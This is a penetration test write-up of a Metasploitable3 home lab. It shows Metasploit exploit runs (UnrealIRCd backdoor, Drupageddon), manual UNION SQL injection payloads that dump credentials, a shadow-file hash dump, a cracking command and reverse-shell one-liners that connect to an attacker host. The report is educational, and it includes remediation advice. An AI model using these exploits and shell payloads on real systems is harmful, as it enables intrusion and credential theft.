Share
## https://sploitus.com/exploit?id=940D3E5C-AE93-53BD-8624-960D303D8D53
# ๐Ÿ›ก๏ธ Metasploitable3 โ€” Home Lab Penetration Test Report

> **Author:** [Sudo-Creator](https://github.com/Sudo-Creator)  
> **Environment:** VirtualBox ยท Kali Linux (Attacker) ยท Metasploitable3 Ubuntu 14.04 (Target)  
> **Target IP:** 10.0.2.5  
> **Scope:** Full network penetration test โ€” enumeration, exploitation, and post-exploitation  
> **Type:** Home Lab / Capture The Flag Practice  

---

## ๐Ÿ“‹ Table of Contents

- [Lab Environment](#-lab-environment)
- [Phase 1 โ€” Host Discovery & Port Scanning](#phase-1--host-discovery--port-scanning)
- [Phase 2 โ€” Service Enumeration](#phase-2--service-enumeration)
- [Phase 3 โ€” Exploitation](#phase-3--exploitation)
  - [UnrealIRCd Backdoor (Port 6697)](#1-unrealircd-backdoor--port-6697)
  - [Drupal Drupageddon โ€” SQLi (Port 80)](#2-drupal-drupageddon--sqli--port-80)
  - [SQL Injection โ€” Payroll App](#3-sql-injection--payroll-app)
  - [SSH Login โ€” Credential Reuse (Port 22)](#4-ssh-login--credential-reuse--port-22)
  - [ProFTPD mod_copy (Port 21)](#5-proftpd-mod_copy--port-21)
- [Phase 4 โ€” Privilege Escalation](#phase-4--privilege-escalation)
- [Phase 5 โ€” Post Exploitation & Reverse Shells](#phase-5--post-exploitation--reverse-shells)
- [Findings Summary](#-findings-summary)
- [Remediation Recommendations](#-remediation-recommendations)
- [Tools Used](#-tools-used)
- [Disclaimer](#-disclaimer)

---

## ๐Ÿ–ฅ๏ธ Lab Environment

| Component | Details |
|---|---|
| Hypervisor | Oracle VirtualBox |
| Attacker Machine | Kali Linux |
| Target Machine | Metasploitable3 (Ubuntu 14.04.6 LTS) |
| Target MAC | `08:00:27:BD:86:A4` (Oracle VirtualBox NIC) |
| Network | Internal / Host-Only Adapter |

---

## Phase 1 โ€” Host Discovery & Port Scanning

### Nmap Full Port Scan

A comprehensive Nmap scan was performed against the target to identify open ports, running services, and the operating system.

```bash
sudo nmap -O -sV -p- -oA metasploitable3 10.0.2.5
```

**Flags used:**

| Flag | Purpose |
|---|---|
| `-O` | OS detection |
| `-sV` | Service/version detection |
| `-p-` | Scan all 65535 ports |
| `-oA` | Save output in all formats |

### Scan Results

```
PORT     STATE   SERVICE     VERSION
21/tcp   open    ftp         ProFTPD 1.3.5
22/tcp   open    ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13
80/tcp   open    http        Apache httpd 2.4.7 (Ubuntu)
445/tcp  open    netbios-ssn Samba smbd 3.X - 4.X
631/tcp  open    ipp         CUPS 1.7
3306/tcp open    mysql       MySQL (unauthorized)
3500/tcp open    http        WEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcp open    irc         UnrealIRCd
8080/tcp open    http        Jetty 8.1.7.v20120910
```

**OS Detection:** Linux (Ubuntu 14.04), Kernel `3.13.0-170-generic`

---

## Phase 2 โ€” Service Enumeration

### Port 21 โ€” FTP (ProFTPD 1.3.5)
ProFTPD 1.3.5 is known to be vulnerable to the **mod_copy** command execution vulnerability (`CVE-2015-3306`). The `SITE CPFR/CPTO` commands allow any unauthenticated user to copy arbitrary files across the filesystem with the privileges of the ProFTPD daemon (`nobody` user by default). This can be abused to copy a PHP payload into the web root for remote code execution.

### Port 22 โ€” SSH (OpenSSH 6.6.1p1)
The SSH service banner reveals a significantly outdated version of OpenSSH. Metasploit's `auxiliary/scanner/ssh/ssh_version` scanner confirmed the server supports multiple **deprecated algorithms**, including `arcfour`, `blowfish-cbc`, `3des-cbc`, `diffie-hellman-group1-sha1`, and `ecdsa-sha2-nistp256` (weak elliptic curve). No publicly exploitable RCE was identified for this version, but the deprecated cipher suite is a significant weakness.

### Port 80 โ€” HTTP (Apache 2.4.7 + Drupal 7.5)
- Visiting `http://10.0.2.5` revealed a **Drupal 7.5** CMS installation.
- The Drupal version was confirmed via `CHANGELOG.txt`.
- A `robots.txt` review exposed several sensitive endpoints: `/admin/`, `/install.php`, `/update.php`, `/xmlrpc.php`, etc.
- A secondary application `payroll_app.php` was discovered and found to be vulnerable to **UNION-based SQL injection**.
- Apache 2.4.7 is also susceptible to **mod_rewrite SSRF** via unsafe `[P]` flag usage.

### Port 445 โ€” SMB (Samba)
The target machine was running Samba. The version appeared to have been spoofed during Metasploit testing, preventing reliable exploitation during this engagement.

### Port 6697 โ€” IRC (UnrealIRCd)
The IRC service was running **UnrealIRCd**. This service is notorious for a critical backdoor vulnerability in version `3.2.8.1` (`CVE-2010-2075`) that allows unauthenticated remote command execution.

### Port 3306 โ€” MySQL
MySQL was running but returned an `unauthorized` banner, indicating it was not directly accessible without credentials.

---

## Phase 3 โ€” Exploitation

---

### 1. UnrealIRCd Backdoor โ€” Port 6697

**CVE:** CVE-2010-2075  
**Module:** `exploit/unix/irc/unreal_ircd_3281_backdoor`  
**Result:** โœ… Shell as `boba_fett`

UnrealIRCd 3.2.8.1 contains a backdoor introduced via a compromised source code distribution. Sending a specially crafted string to the IRC port triggers command execution on the server.

```bash
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(...) > set LHOST 10.147.62.126
msf exploit(...) > set RHOST 10.147.62.192
msf exploit(...) > set RPORT 6697
msf exploit(...) > set payload cmd/unix/reverse_perl
msf exploit(...) > run
```

```
[*] Started reverse TCP handler on 10.147.62.126:4444
[*] 10.147.62.192:6697 - Sending IRC backdoor command
[*] Command shell session 1 opened (10.147.62.126:4444 -> 10.147.62.192:53611)

whoami
boba_fett

pwd
/opt/unrealircd/Unreal3.2
```

**Note:** The initial shell landed in the UnrealIRCd directory as `boba_fett`. Navigation to other directories was restricted by the user's privilege level, confirming this was a low-privilege foothold.

---

### 2. Drupal Drupageddon โ€” SQLi โ€” Port 80

**CVE:** CVE-2014-3704 (Drupageddon)  
**Module:** `exploit/multi/http/drupal_drupageddon`  
**Result:** โœ… Shell as `www-data`

Drupal 7.x before 7.32 is vulnerable to a critical SQL injection in the database abstraction layer. This allows unauthenticated attackers to execute arbitrary queries, ultimately leading to remote code execution.

```bash
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(...) > set RHOSTS 10.147.62.192
msf exploit(...) > set payload php/reverse_perl
msf exploit(...) > run
```

```
[*] Started reverse TCP handler on 10.147.62.126:4444
[*] Command shell session 1 opened (10.147.62.126:4444 -> 10.147.62.192:53682)

whoami
www-data
```

**Post-exploitation enumeration from this shell:**

Drupal version confirmed:
```bash
cat CHANGELOG.txt
# Drupal 7.5, 2011-07-27
```

System users discovered:
```bash
ls ../../../../../../home

anakin_skywalker   artoo_detoo   ben_kenobi   boba_fett
c_three_pio        chewbacca     darth_vader  greedo
han_solo           jabba_hutt    jarjar_binks kylo_ren
lando_calrissian   leia_organa   luke_skywalker vagrant
```

---

### 3. SQL Injection โ€” Payroll App

**Type:** UNION-Based SQL Injection (Manual)  
**Target:** `http://10.0.2.5/payroll_app.php`  
**Result:** โœ… Full database dump including plaintext credentials

The `payroll_app.php` login form was tested with SQL injection payloads. A basic authentication bypass confirmed the vulnerability, and further UNION-based payloads enumerated the full database.

**Authentication Bypass:**
```sql
' or 1=1#
```
This returned all records from the users table, including `username`, `first_name`, `last_name`, and `salary`, confirming a 4-column table structure.

**Database Version:**
```sql
' UNION SELECT null, null, @@version, null#
-- Result: 5.5.62-0ubuntu0.14.04.1
```

**Enumerate Databases:**
```sql
' UNION SELECT null,null,GROUP_CONCAT(schema_name),null FROM information_schema.schemata#
-- Result: information_schema | drupal | mysql | payroll | performance_schema
```

**Enumerate Tables in `payroll`:**
```sql
' UNION SELECT null,null,null,GROUP_CONCAT(0x7c,table_name,0x7C)
  FROM information_schema.tables WHERE table_schema='payroll'#
-- Result: users
```

**Enumerate Columns in `users`:**
```sql
' UNION SELECT null,null,null,GROUP_CONCAT(0x7c,column_name,0x7C)
  FROM information_schema.columns WHERE table_name='users'#
-- Result: uid | name | pass | username | first_name | last_name | password | salary | ...
```

**Dump Credentials:**
```sql
' UNION SELECT username, password, salary, null FROM users#
```

| Username | Password | Salary |
|---|---|---|
| leia_organa | help_me_obiwan | 9560 |
| luke_skywalker | like_my_father_beforeme | 1080 |
| han_solo | nerf_herder | 1200 |
| artoo_detoo | b00p_b33p | 22222 |
| c_three_pio | Pr0t0c07 | 3200 |
| ben_kenobi | thats_no_m00n | 10000 |
| darth_vader | Dark_syD3 | 6666 |
| anakin_skywalker | but_master:( | 1025 |
| jarjar_binks | mesah_p@ssw0rd | 2048 |
| lando_calrissian | @dm1n1str8r | 40000 |
| boba_fett | mandalorian1 | 20000 |
| jabba_hutt | my_kinda_skum | 65000 |
| greedo | hanSh0tF1rst | 50000 |
| chewbacca | rwaaaaawr8 | 4500 |
| kylo_ren | Daddy_Issues2 | 6667 |

---

### 4. SSH Login โ€” Credential Reuse โ€” Port 22

**Module:** `auxiliary/scanner/ssh/ssh_login`  
**Result:** โœ… Shell as `vagrant` (sudo ALL privileges)

SSH version enumeration was performed first to fingerprint the server:

```bash
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(...) > set RHOSTS 10.147.62.192
msf auxiliary(...) > run
```

```
SSH server version: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13
```

The scan confirmed numerous **deprecated cipher algorithms**, including `arcfour256`, `blowfish-cbc`, `3des-cbc`, `arcfour128`, and deprecated key exchange methods including `diffie-hellman-group1-sha1`. This indicates the system is severely out of date.

The default Metasploitable3 credential pair `vagrant:vagrant` was then tested:

```bash
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(...) > set RHOST 10.147.62.192
msf auxiliary(...) > set USERNAME vagrant
msf auxiliary(...) > set PASSWORD vagrant
msf auxiliary(...) > set THREADS 3
msf auxiliary(...) > run
```

```
[+] 10.147.62.192:22 - Success: 'vagrant:vagrant'
    uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)
[*] SSH session 1 opened
```

**Privilege Check:**
```bash
sudo -l

User vagrant may run the following commands on metasploitable3-ub1404:
    (ALL : ALL) ALL
    (ALL : ALL) NOPASSWD: ALL
```

The `vagrant` user has **full unrestricted sudo access with no password required**, effectively equivalent to root.

Shell upgraded to interactive PTY:
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

---

### 5. ProFTPD mod_copy โ€” Port 21

**CVE:** CVE-2015-3306  
**Module:** `exploit/unix/ftp/proftpd_modcopy_exec`  
**Result:** โš ๏ธ Module failed against this target instance

The FTP service was identified as ProFTPD 1.3.5. While the `proftpd_modcopy_exec` Metasploit module exists for this vulnerability, it **did not succeed** against this Metasploitable3 instance. This may be due to specific configuration differences or restrictions in this build.

**Vulnerability Summary:** The `mod_copy` module allows unauthenticated users to copy files via `SITE CPFR` / `SITE CPTO` commands with the daemon's privileges, which can be chained with a webshell for RCE.

---

## Phase 4 โ€” Privilege Escalation

### Path 1 โ€” Sudo via SSH (vagrant)

The `vagrant` user already had `NOPASSWD: ALL` sudo rights, granting immediate root-level access:

```bash
sudo su
id
# uid=0(root) gid=0(root) groups=0(root)
```

### Path 2 โ€” Sudo via Credential Reuse (luke_skywalker)

Credentials dumped from the SQL injection were tested over SSH. `luke_skywalker:like_my_father_beforeme` was valid:

```bash
ssh luke_skywalker@10.147.62.192

sudo -l
# User luke_skywalker may run the following commands:
#     (ALL : ALL) ALL
```

`luke_skywalker` also had full sudo access. This allowed dumping `/etc/shadow`:

```
vagrant:$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/...
leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/
luke_skywalker:$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/
darth_vader:$1$rLuMkR1R$YHumHRxhswnfO7eTUUfHJ.
lando_calrissian:$1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0
# ... (all 16 hashes dumped)
```

**Offline Hash Cracking Attempt (John the Ripper):**

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt hashes.txt
```

The session was aborted due to hardware speed limitations before cracking completed. The hashes use `md5crypt ($1$)` which is a relatively weak hashing scheme and would be crackable given sufficient compute time.

**Proof of Compromise (PoC) โ€” User Creation:**

```bash
sudo useradd dean
sudo usermod -a -G audio dean
id
# uid=0(root) gid=0(root) groups=0(root)

su dean
id
# uid=1001(dean) gid=1001(dean) groups=1001(dean),29(audio)
```

---

## Phase 5 โ€” Post Exploitation & Reverse Shells

Multiple reverse shell techniques were demonstrated using `msfvenom` to generate payloads and `netcat` as the listener.

### Bash Reverse Shell

```bash
msfvenom -p cmd/unix/reverse_bash LHOST=10.147.62.126 LPORT=4444 R
# Payload: bash -c '0/dev/tcp/10.147.62.126/4444;sh &217 2>&217'
```

Listener:
```bash
nc -lnvp 4444
```

Callback received:
```
connect to [10.147.62.126] from (UNKNOWN) [10.147.62.192] 60784
whoami
vagrant
```

---

### Netcat Reverse Shell (mkfifo)

```bash
msfvenom -p cmd/unix/reverse_netcat LHOST=10.147.62.126 LPORT=4444 R
# Payload: mkfifo /tmp/kghs; nc 10.147.62.126 4444 0/tmp/kghs 2>&1; rm /tmp/kghs
```

Callback received:
```
connect to [10.147.62.126] from (UNKNOWN) [10.147.62.192] 60795
whoami
vagrant
id
uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)
```

---

### PHP Reverse Shell

```bash
msfvenom -p php/unix/cmd/reverse_python LHOST=10.147.62.126 LPORT=4444 R > reverse.php
```

The payload was saved to `reverse.php`, uploaded to the target via SSH, and executed:

```bash
php reverse.php
```

Callback received from the PHP payload via the Apache web server's PHP interpreter, confirming remote code execution through the web stack.

---

## ๐Ÿ“Š Findings Summary

| # | Vulnerability | Port | Severity | Result |
|---|---|---|---|---|
| 1 | UnrealIRCd 3.2.8.1 Backdoor (CVE-2010-2075) | 6697 | ๐Ÿ”ด Critical | Shell as `boba_fett` |
| 2 | Drupal Drupageddon SQLi (CVE-2014-3704) | 80 | ๐Ÿ”ด Critical | Shell as `www-data` |
| 3 | UNION-Based SQL Injection โ€” Payroll App | 80 | ๐Ÿ”ด Critical | Full DB dump + plaintext creds |
| 4 | SSH Default Credentials (`vagrant:vagrant`) | 22 | ๐Ÿ”ด Critical | Root-level access (NOPASSWD sudo) |
| 5 | Credential Reuse โ€” `luke_skywalker` SSH | 22 | ๐Ÿ”ด Critical | Root-level access (sudo ALL) |
| 6 | Shadow File Dumped โ€” md5crypt Hashes | N/A | ๐Ÿ”ด Critical | 16 hashes extracted |
| 7 | ProFTPD 1.3.5 mod_copy (CVE-2015-3306) | 21 | ๐ŸŸ  High | Not exploitable in this build |
| 8 | Deprecated SSH Cipher Suite | 22 | ๐ŸŸก Medium | Info only โ€” legacy algos confirmed |
| 9 | Drupal `CHANGELOG.txt` / `robots.txt` exposed | 80 | ๐ŸŸก Medium | Version disclosure |
| 10 | Plaintext Credentials in Database | 3306 | ๐Ÿ”ด Critical | Passwords stored in cleartext |

---

## ๐Ÿ”ง Remediation Recommendations

| Finding | Recommendation |
|---|---|
| UnrealIRCd Backdoor | Upgrade to a patched, verified version of UnrealIRCd; verify source integrity with checksums |
| Drupal Drupageddon | Upgrade Drupal to the latest stable release; apply security patches immediately |
| SQL Injection (Payroll) | Use parameterised queries / prepared statements; never concatenate user input into SQL |
| Default SSH Credentials | Remove or rotate default `vagrant` credentials; enforce key-based authentication only |
| Credential Reuse | Enforce unique passwords per service; implement a password policy |
| Weak Password Hashing | Replace `md5crypt ($1$)` with `bcrypt` or `Argon2id`; never store passwords in plaintext |
| Deprecated SSH Ciphers | Harden `sshd_config` to disable all deprecated algorithms; upgrade to OpenSSH 9.x+ |
| Sudo Misconfiguration | Remove `NOPASSWD: ALL` grants; apply least-privilege sudo rules per user |
| Version Disclosure | Restrict access to `CHANGELOG.txt`, `robots.txt`, and sensitive configuration files |
| ProFTPD mod_copy | Disable `mod_copy` in `proftpd.conf` or upgrade to a patched version |

---

## ๐Ÿ› ๏ธ Tools Used

| Tool | Purpose |
|---|---|
| `nmap` | Port scanning, service/version detection, OS fingerprinting |
| `Metasploit Framework` | Exploitation, auxiliary scanners, session management |
| `msfvenom` | Reverse shell payload generation |
| `netcat (nc)` | Reverse shell listener |
| `John the Ripper` | Offline password hash cracking |
| `SSH` | Remote access and payload delivery |
| Manual SQL Injection | UNION-based injection via browser / curl |

---

## โš ๏ธ Disclaimer

> This penetration test was conducted **exclusively within a personal home lab environment** using intentionally vulnerable software (Metasploitable3 by Rapid7). All activity was performed on isolated virtual machines with no connection to any production network, third-party systems, or external infrastructure.
>
> **This report is intended solely for educational purposes and personal skill development.** Performing any of these techniques against systems without explicit written permission is illegal and unethical.
>
> The author does not condone unauthorised access to computer systems.

---


  Built with ๐Ÿ” by Sudo-Creator